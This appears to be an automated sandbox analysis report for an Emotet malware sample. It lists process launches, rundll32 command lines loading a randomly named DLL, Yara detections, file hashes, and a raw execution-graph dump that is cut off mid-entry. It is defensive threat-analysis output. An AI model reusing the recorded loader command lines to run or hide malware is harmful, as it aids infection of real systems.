                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:32
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bcdsqhgufomb\pnioy.zya",aBwRbswnSV
                                                                                                                                                                          Imagebase:0xcc0000
                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.265146904.0000000004C31000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.265087151.0000000004AD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:32
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6472 -ip 6472
                                                                                                                                                                          Imagebase:0x860000
                                                                                                                                                                          File size:434592 bytes
                                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:33
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bcdsqhgufomb\pnioy.zya",DllRegisterServer
                                                                                                                                                                          Imagebase:0xcc0000
                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.778909402.0000000005431000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.778167159.0000000005000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.778579352.0000000005231000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.779222222.0000000005591000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.778010320.0000000004EE1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.777944852.0000000004EB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.778445714.0000000005151000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.777650877.00000000048D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.774608626.0000000000C11000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.776784898.0000000002E20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.773982727.0000000000B01000.00000020.00000010.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.774216836.0000000000B50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.777836240.0000000004D81000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.777801455.0000000004D50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.779081718.0000000005531000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.773825240.0000000000AD0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.778524005.0000000005200000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.778353822.0000000005120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.778061174.0000000004F10000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.778216857.0000000005031000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.778826105.0000000005400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.779165292.0000000005560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.778104537.0000000004F41000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.779010821.0000000005500000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:34
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 524
                                                                                                                                                                          Imagebase:0x860000
                                                                                                                                                                          File size:434592 bytes
                                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:41
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:43
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:43
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6472 -ip 6472
                                                                                                                                                                          Imagebase:0x860000
                                                                                                                                                                          File size:434592 bytes
                                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:45
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:45
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 512
                                                                                                                                                                          Imagebase:0x860000
                                                                                                                                                                          File size:434592 bytes
                                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:46
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                          Imagebase:0x7ff6fce90000
                                                                                                                                                                          File size:163336 bytes
                                                                                                                                                                          MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:46
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:47
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:54
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:26:11
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:26:47
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                          Imagebase:0x7ff6c8ec0000
                                                                                                                                                                          File size:455656 bytes
                                                                                                                                                                          MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:26:48
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff7ecfc0000
                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:27:51
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                          Disassembly

                                                                                                                                                                          Code Analysis

                                                                                                                                                                          Reset < >

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:2.1%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                            Signature Coverage:55.7%
                                                                                                                                                                            Total number of Nodes:1071
                                                                                                                                                                            Total number of Limit Nodes:5

                                                                                                                                                                            Graph

                                                                                                                                                                            execution_graph 3909 2f66395 3910 2f66453 3909->3910 3911 2f6647e 3909->3911 3915 2f6efdd 3910->3915 3925 2f6f548 3915->3925 3918 2f6f760 3954 2f685ff 3918->3954 3919 2f66466 3919->3911 3928 2f6d11a 3919->3928 3923 2f6e1f8 GetPEB 3923->3925 3925->3918 3925->3919 3925->3923 3927 2f6fecb GetPEB 3925->3927 3931 2f7061d 3925->3931 3935 2f51a34 3925->3935 3939 2f70db1 3925->3939 3943 2f72d0a 3925->3943 3947 2f6fe2a 3925->3947 3951 2f5c307 3925->3951 3927->3925 3929 2f5eb52 GetPEB 3928->3929 3930 2f6d1b1 3929->3930 3930->3911 3932 2f70636 3931->3932 3964 2f5eb52 3932->3964 3936 2f51a59 3935->3936 3937 2f5eb52 GetPEB 3936->3937 3938 2f51aeb 3937->3938 3938->3925 3940 2f70dcc 3939->3940 3994 2f6bb96 3940->3994 3944 2f72d2f 3943->3944 3998 2f731aa 3944->3998 3948 2f6fe3d 3947->3948 4001 2f5c28c 3948->4001 3952 2f5eb52 GetPEB 3951->3952 3953 2f5c39e 3952->3953 3953->3925 3955 2f68626 3954->3955 3956 2f6fe2a GetPEB 3955->3956 3957 2f6878e 3956->3957 4009 2f72c24 3957->4009 3960 2f687d2 3960->3919 3963 2f71538 GetPEB 3963->3960 3965 2f5ec1b lstrcmpiW 3964->3965 3966 2f5ebf7 3964->3966 3965->3925 3970 2f6567b 3966->3970 3968 2f5ec06 3973 2f5ec31 3968->3973 3977 2f5f7f7 GetPEB 3970->3977 3972 2f6573b 3972->3968 3975 2f5ec50 3973->3975 3974 2f5ed2e 3974->3965 3975->3974 3978 2f57e79 3975->3978 3977->3972 3979 2f57fa7 3978->3979 3986 2f5801a 3979->3986 3982 2f57fe4 3984 2f5ec31 GetPEB 3982->3984 3985 2f58011 3982->3985 3984->3985 3985->3974 3987 2f5802d 3986->3987 3988 2f5eb52 GetPEB 3987->3988 3989 2f57fcb 3988->3989 3989->3982 3990 2f5483c 3989->3990 3991 2f5484c 3990->3991 3992 2f5eb52 GetPEB 3991->3992 3993 2f548d1 3992->3993 3993->3982 3995 2f6bbbe 3994->3995 3996 2f5eb52 GetPEB 3995->3996 3997 2f6bc5c 3996->3997 3997->3925 3999 2f5eb52 GetPEB 3998->3999 4000 2f72d4b 3999->4000 4000->3925 4002 2f5c2a9 4001->4002 4005 2f576e0 4002->4005 4006 2f576f8 4005->4006 4007 2f5eb52 GetPEB 4006->4007 4008 2f57793 4007->4008 4008->3925 4010 2f72c57 4009->4010 4011 2f5eb52 GetPEB 4010->4011 4012 2f687c7 4011->4012 4012->3960 4013 2f71538 4012->4013 4014 2f71548 4013->4014 4015 2f5eb52 GetPEB 4014->4015 4016 2f687ec 4015->4016 4016->3963 4068 2f6a2a5 4069 2f6a419 4068->4069 4070 2f6a467 4069->4070 4076 2f64244 4069->4076 4075 2f6fecb GetPEB 4075->4070 4077 2f6425e 4076->4077 4078 2f5c5d8 GetPEB 4077->4078 4079 2f6430e 4078->4079 4080 2f73560 4079->4080 4081 2f7357f 4080->4081 4082 2f6a44b 4081->4082 4084 2f6bddd 4081->4084 4082->4075 4085 2f6bdf6 4084->4085 4086 2f5eb52 GetPEB 4085->4086 4087 2f6be7e 4086->4087 4087->4081 4088 2f51a2c 4089 2f51a59 4088->4089 4090 2f5eb52 GetPEB 4089->4090 4091 2f51aeb 4090->4091 4017 2f6befd 4030 2f609dd 4017->4030 4020 2f7061d 2 API calls 4021 2f6c1b8 4020->4021 4029 2f6c229 4021->4029 4034 2f6e1f8 4021->4034 4023 2f6c1d6 4024 2f72d0a GetPEB 4023->4024 4025 2f6c1ff 4024->4025 4038 2f6fecb 4025->4038 4031 2f609f3 4030->4031 4032 2f5eb52 GetPEB 4031->4032 4033 2f60a85 4032->4033 4033->4020 4035 2f6e211 4034->4035 4046 2f5c5d8 4035->4046 4037 2f6e2da 4037->4023 4037->4037 4039 2f6fee3 4038->4039 4058 2f72b09 4039->4058 4042 2f5d061 4043 2f5d07a 4042->4043 4044 2f5eb52 GetPEB 4043->4044 4045 2f5d141 4044->4045 4045->4029 4051 2f728eb 4046->4051 4052 2f5eb52 GetPEB 4051->4052 4053 2f5c69c 4052->4053 4054 2f6648a 4053->4054 4055 2f664a6 4054->4055 4056 2f5eb52 GetPEB 4055->4056 4057 2f5c6b1 4056->4057 4057->4037 4059 2f72b1f 4058->4059 4060 2f728eb GetPEB 4059->4060 4061 2f72bd9 4060->4061 4064 2f60c2a 4061->4064 4065 2f60c42 4064->4065 4066 2f5eb52 GetPEB 4065->4066 4067 2f60ce9 4066->4067 4067->4042 4092 2f736aa 4102 2f73bc2 4092->4102 4093 2f5c5d8 GetPEB 4093->4102 4094 2f72b09 GetPEB 4094->4102 4095 2f70db1 GetPEB 4095->4102 4096 2f73df0 4097 2f71538 GetPEB 4096->4097 4098 2f73dee 4097->4098 4099 2f609dd GetPEB 4099->4102 4102->4093 4102->4094 4102->4095 4102->4096 4102->4098 4102->4099 4103 2f7061d 2 API calls 4102->4103 4105 2f745ca 4102->4105 4109 2f6e406 4102->4109 4113 2f727bc 4102->4113 4103->4102 4106 2f745fd 4105->4106 4107 2f5eb52 GetPEB 4106->4107 4108 2f746a3 4107->4108 4108->4102 4110 2f6e434 4109->4110 4111 2f5eb52 GetPEB 4110->4111 4112 2f6e4c9 4111->4112 4112->4102 4114 2f727cf 4113->4114 4115 2f5eb52 GetPEB 4114->4115 4116 2f72873 4115->4116 4116->4102 4117 2f5f1cb 4122 2f58636 4117->4122 4119 2f5f26d 4120 2f6d11a GetPEB 4119->4120 4121 2f5f281 4120->4121 4154 2f59ad5 4122->4154 4123 2f5a3e5 4372 2f627f9 4123->4372 4125 2f70e63 GetPEB 4125->4154 4131 2f5a3c7 4362 2f717bd 4131->4362 4132 2f5a3c5 4132->4119 4148 2f63d85 GetPEB 4148->4154 4152 2f72b09 GetPEB 4152->4154 4154->4123 4154->4125 4154->4131 4154->4132 4154->4148 4154->4152 4156 2f6fecb GetPEB 4154->4156 4159 2f71028 4154->4159 4163 2f64f74 4154->4163 4171 2f62142 4154->4171 4185 2f5670b 4154->4185 4193 2f577a3 4154->4193 4198 2f530e7 4154->4198 4203 2f72699 4154->4203 4207 2f6bd13 4154->4207 4211 2f6d1bc 4154->4211 4221 2f5bdf9 4154->4221 4224 2f63eaa 4154->4224 4230 2f5de74 4154->4230 4240 2f6e955 4154->4240 4251 2f54b5d 4154->4251 4254 2f72009 4154->4254 4265 2f5c6b8 4154->4265 4278 2f5d14c 4154->4278 4291 2f6c5d5 4154->4291 4295 2f6fbde 4154->4295 4300 2f64a66 4154->4300 4310 2f6ad08 4154->4310 4320 2f6c387 4154->4320 4325 2f6e4e5 4154->4325 4337 2f69a01 4154->4337 4346 2f68d3d 4154->4346 4353 2f5a445 4154->4353 4156->4154 4160 2f71041 4159->4160 4161 2f5eb52 GetPEB 4160->4161 4162 2f710cd 4161->4162 4162->4154 4168 2f6522f 4163->4168 4165 2f609dd GetPEB 4165->4168 4166 2f65328 4166->4154 4167 2f6e1f8 GetPEB 4167->4168 4168->4165 4168->4166 4168->4167 4169 2f72d0a GetPEB 4168->4169 4170 2f6fecb GetPEB 4168->4170 4386 2f6437a 4168->4386 4169->4168 4170->4168 4172 2f62628 4171->4172 4173 2f6e1f8 GetPEB 4172->4173 4174 2f627af 4172->4174 4177 2f62793 4172->4177 4179 2f5c5d8 GetPEB 4172->4179 4181 2f62791 4172->4181 4183 2f6fecb GetPEB 4172->4183 4414 2f68b9e 4172->4414 4418 2f5738a 4172->4418 4173->4172 4175 2f72b09 GetPEB 4174->4175 4180 2f627c9 4175->4180 4422 2f5f7fe 4177->4422 4179->4172 4182 2f72b09 GetPEB 4180->4182 4181->4154 4182->4181 4183->4172 4189 2f56a16 4185->4189 4187 2f70db1 GetPEB 4187->4189 4189->4187 4190 2f56b43 4189->4190 4191 2f745ca GetPEB 4189->4191 4192 2f71538 GetPEB 4189->4192 4426 2f6dbc1 4189->4426 4430 2f6ca1f 4189->4430 4190->4154 4191->4189 4192->4189 4195 2f577cc 4193->4195 4194 2f6cad5 GetPEB 4194->4195 4195->4194 4196 2f57e67 4195->4196 4197 2f5c5d8 GetPEB 4195->4197 4196->4154 4197->4195 4202 2f531a7 4198->4202 4200 2f5325b 4200->4154 4202->4200 4434 2f7161b 4202->4434 4438 2f72a36 4202->4438 4204 2f726b3 4203->4204 4205 2f727a6 4204->4205 4206 2f6ff58 GetPEB 4204->4206 4205->4154 4206->4204 4208 2f6bd2c 4207->4208 4209 2f5eb52 GetPEB 4208->4209 4210 2f6bdd2 4209->4210 4210->4154 4218 2f6d202 4211->4218 4213 2f6fe2a GetPEB 4213->4218 4217 2f6d8c2 4217->4154 4218->4213 4218->4217 4220 2f72b09 GetPEB 4218->4220 4442 2f56b7a 4218->4442 4450 2f65779 4218->4450 4462 2f580c0 4218->4462 4472 2f62e5d 4218->4472 4490 2f667e6 4218->4490 4220->4218 4222 2f5c5d8 GetPEB 4221->4222 4223 2f5be8c 4222->4223 4223->4154 4226 2f64051 4224->4226 4225 2f6416b 4225->4154 4226->4225 4227 2f609dd GetPEB 4226->4227 4638 2f5dd35 4226->4638 4641 2f60aba 4226->4641 4227->4226 4238 2f5e069 4230->4238 4231 2f5e1e6 4697 2f554b6 4231->4697 4234 2f72b09 GetPEB 4234->4238 4235 2f5e1e4 4235->4154 4238->4231 4238->4234 4238->4235 4239 2f5c307 GetPEB 4238->4239 4682 2f6e0f2 4238->4682 4686 2f68c7d 4238->4686 4690 2f6f840 4238->4690 4239->4238 4244 2f6edaa 4240->4244 4241 2f745ca GetPEB 4241->4244 4242 2f6efc1 4243 2f71538 GetPEB 4242->4243 4245 2f6efbf 4243->4245 4244->4241 4244->4242 4244->4245 4246 2f6e1f8 GetPEB 4244->4246 4248 2f72d0a GetPEB 4244->4248 4249 2f6ca1f GetPEB 4244->4249 4250 2f6fecb GetPEB 4244->4250 4705 2f744ff 4244->4705 4245->4154 4246->4244 4248->4244 4249->4244 4250->4244 4252 2f71028 GetPEB 4251->4252 4253 2f54bf5 4252->4253 4253->4154 4255 2f5556b GetPEB 4254->4255 4264 2f72465 4255->4264 4256 2f725bf 4716 2f6654a 4256->4716 4258 2f725bd 4258->4154 4259 2f72d0a GetPEB 4259->4264 4260 2f6e1f8 GetPEB 4260->4264 4262 2f6fecb GetPEB 4262->4264 4264->4256 4264->4258 4264->4259 4264->4260 4264->4262 4709 2f5dc1b 4264->4709 4712 2f744ad 4264->4712 4275 2f5cdac 4265->4275 4266 2f6e1f8 GetPEB 4266->4275 4269 2f5cdf0 4738 2f553d0 4269->4738 4270 2f51a34 GetPEB 4270->4275 4273 2f5d05c 4273->4273 4275->4266 4275->4269 4275->4270 4275->4273 4277 2f6fecb GetPEB 4275->4277 4742 2f600c5 4275->4742 4746 2f62cd9 4275->4746 4750 2f52dea 4275->4750 4754 2f5f96f 4275->4754 4277->4275 4281 2f5d807 4278->4281 4279 2f5da79 4282 2f53046 GetPEB 4279->4282 4280 2f51a34 GetPEB 4280->4281 4281->4279 4281->4280 4283 2f5da77 4281->4283 4286 2f6e1f8 GetPEB 4281->4286 4289 2f5f96f GetPEB 4281->4289 4290 2f6fecb GetPEB 4281->4290 4758 2f53046 4281->4758 4762 2f6b257 4281->4762 4775 2f67c4e 4281->4775 4779 2f6e8b6 4281->4779 4282->4283 4283->4154 4286->4281 4289->4281 4290->4281 4294 2f6c7d3 4291->4294 4292 2f5dc1b GetPEB 4292->4294 4293 2f6c8ad 4293->4154 4294->4292 4294->4293 4298 2f6fcf5 4295->4298 4297 2f5c5d8 GetPEB 4297->4298 4298->4297 4299 2f6fd44 4298->4299 4799 2f69df5 4298->4799 4299->4154 4309 2f64ded 4300->4309 4301 2f51a34 GetPEB 4301->4309 4302 2f53046 GetPEB 4302->4309 4303 2f5c5d8 GetPEB 4303->4309 4305 2f64f25 4306 2f70db1 GetPEB 4305->4306 4307 2f64f23 4306->4307 4307->4154 4308 2f6e8b6 GetPEB 4308->4309 4309->4301 4309->4302 4309->4303 4309->4305 4309->4307 4309->4308 4828 2f607f4 4309->4828 4313 2f6b06a 4310->4313 4311 2f70db1 GetPEB 4311->4313 4312 2f6e1f8 GetPEB 4312->4313 4313->4311 4313->4312 4314 2f6b173 4313->4314 4315 2f6654a GetPEB 4313->4315 4316 2f72d0a GetPEB 4313->4316 4318 2f6b171 4313->4318 4319 2f6fecb GetPEB 4313->4319 4835 2f67a0f 4314->4835 4315->4313 4316->4313 4318->4154 4319->4313 4321 2f5556b GetPEB 4320->4321 4322 2f6c401 4321->4322 4845 2f6b19c 4322->4845 4326 2f6e50b 4325->4326 4329 2f5c5d8 GetPEB 4326->4329 4334 2f6e8a9 4326->4334 4849 2f67d5b 4326->4849 4869 2f700ef 4326->4869 4881 2f5b820 4326->4881 4888 2f5a871 4326->4888 4909 2f6ccd9 4326->4909 4917 2f5238c 4326->4917 4938 2f6a474 4326->4938 4958 2f72d53 4326->4958 4329->4326 4334->4154 4340 2f69a1f 4337->4340 4339 2f69c42 4341 2f72b09 GetPEB 4339->4341 4340->4339 4344 2f69c40 4340->4344 4345 2f5c5d8 GetPEB 4340->4345 5071 2f5dca0 4340->5071 5075 